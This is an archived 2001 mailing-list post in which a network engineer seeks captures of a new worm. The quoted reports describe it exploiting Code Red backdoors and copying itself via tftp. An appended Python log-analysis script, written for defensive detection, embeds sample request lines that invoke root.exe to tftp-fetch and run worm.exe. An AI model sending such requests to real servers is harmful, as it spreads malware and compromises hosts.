Worm probes.. Looking for captures.
Michael Airhart
mairhart at cisco.com
Tue Sep 18 16:49:34 UTC 2001
Folks,
If anyone has a packet capture of the infection in progress, would you
please contact me. I would like to get it to some of the Cisco IOS
folks ASAP. (Not my official job, but would like to help.)
Thanks!!
Michael Airhart
At 11:54 AM 9/18/2001 -0400, Eric Gauthier wrote:
> > Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
> > I've nailed a copy, and am working on getting it to the right security
> > people. A *PRELIMINARY* (eyeballing the output of 'strings' indicates that
> > this one *both* sends itself via e-mail a la SirCam, *AND* scans for
> > vulnerable web servers, and if it finds a vulnerable server, it causes anybody
> > visiting that webpage to be offered a contaminated .exe as well.
> > I do *NOT* have a handle on what malicious effects it has other than just
> > propagating.
>
>I work at a large university and our security guys think this guy is what's
>been causing us problems all morning. Lots of subnet scans (tons of
>incomplete arps), CC Mail servers are whacking out, HPOV noting that
>old 3Com gear is dropping etc. This is what I've heard through the rumor
>mill (so take it with a grain of salt)...
>
>"...At first blush, it spreads itself via web, email, and maybe shares.
>We've seen it spreading by a set of two HTTP requests. It will look for
>backdoors left behind by Code Red, such as /scripts/root.exe. It uses tftp
>to copy itself to the target machine then launches it via a second HTTP
>command."
>
>Eric :)
--------------------------------------------------------------------------------------------------------
Michael Airhart 512/378-1246 Office
Consulting Systems Engineer 413/480-1958 eFax
Cisco Systems, Inc. 800/365-4578 Pager
12515 Research Blvd mairhart at cisco.com
Austin, TX 78759
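The two-request pattern the quoted note describes (a request to a Code Red backdoor such as /scripts/root.exe whose command line invokes tftp to pull the file onto the host, followed by a second request that launches it) can be picked out of a web server's access log, which is often easier to obtain than the packet capture requested above. The script below is an added example, not code from this thread or from any of the people in it. The log layout (a simplified W3C-style line: date, time, client IP, method, URI stem, URI query, status), the sample lines, the client addresses and the file name worm.exe are all constructed; treating any path that ends in /root.exe as a backdoor, rather than only /scripts/root.exe, is an assumption.

```python
"""Flag the copy-then-launch propagation sequence in web access logs.

Per client IP, a request to a root.exe backdoor that runs tftp is the
"copy" step; any later root.exe request from the same client is the
"launch" step.  Everything below (log format, sample lines, addresses)
is constructed for this example.
"""

import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log.  Fields: date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status ("-" means no query string).
SAMPLE_LOG = """\
2001-09-18 11:02:13 10.0.0.5 GET /default.htm - 200
2001-09-18 11:02:14 10.0.0.7 GET /scripts/root.exe /c+tftp%20-i%2010.0.0.7%20GET%20worm.exe 502
2001-09-18 11:02:15 10.0.0.7 GET /scripts/root.exe /c+worm.exe 502
2001-09-18 11:02:16 10.0.0.7 GET /index.htm - 200
2001-09-18 11:03:40 10.0.0.9 GET /scripts/root.exe /c+dir 404
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse_line(line):
    """Split one log line into a dict; return None for lines that do not fit."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    date, time, ip, method, stem, query, status = m.groups()
    # Decode %XX escapes and '+' so the command line reads as the host saw it.
    query = "" if query == "-" else unquote_plus(query)
    return {"ts": f"{date} {time}", "ip": ip, "method": method,
            "stem": stem, "query": query, "status": int(status)}


def classify(rec):
    """Label a backdoor request as 'tftp-copy' or 'backdoor-exec'; None otherwise."""
    # Assumption: the backdoor may be reachable under more than one script
    # directory, so match on the file name rather than the exact path.
    if not rec["stem"].lower().endswith("/root.exe"):
        return None
    if "tftp" in rec["query"].lower():
        return "tftp-copy"
    return "backdoor-exec"


def find_propagation(log_text):
    """Return {client_ip: verdict} for every client that touched a backdoor.

    Verdicts: 'copy-and-launch' (tftp copy followed by another backdoor
    command), 'copy-only' (tftp copy with no follow-up seen), or 'probe'
    (backdoor used without tftp, e.g. a scan for Code Red leftovers).
    """
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label:
            per_ip[rec["ip"]].append((rec["ts"], label, rec["query"]))

    findings = {}
    for ip, events in per_ip.items():
        labels = [label for _, label, _ in events]
        if "tftp-copy" in labels:
            first_copy = labels.index("tftp-copy")
            launched = any(label == "backdoor-exec" for _, label, _ in events[first_copy + 1:])
            findings[ip] = "copy-and-launch" if launched else "copy-only"
        else:
            findings[ip] = "probe"
    return findings


if __name__ == "__main__":
    for ip, verdict in sorted(find_propagation(SAMPLE_LOG).items()):
        print(f"{ip:15} {verdict}")
```

Run against a real IIS log the field order will differ, so adjust LINE_RE to the log's #Fields header before use; the classification and per-client grouping stay the same. A client in the "probe" state is worth watching even without a tftp line, since the first quoted report says the worm scans for vulnerable servers before it does anything else.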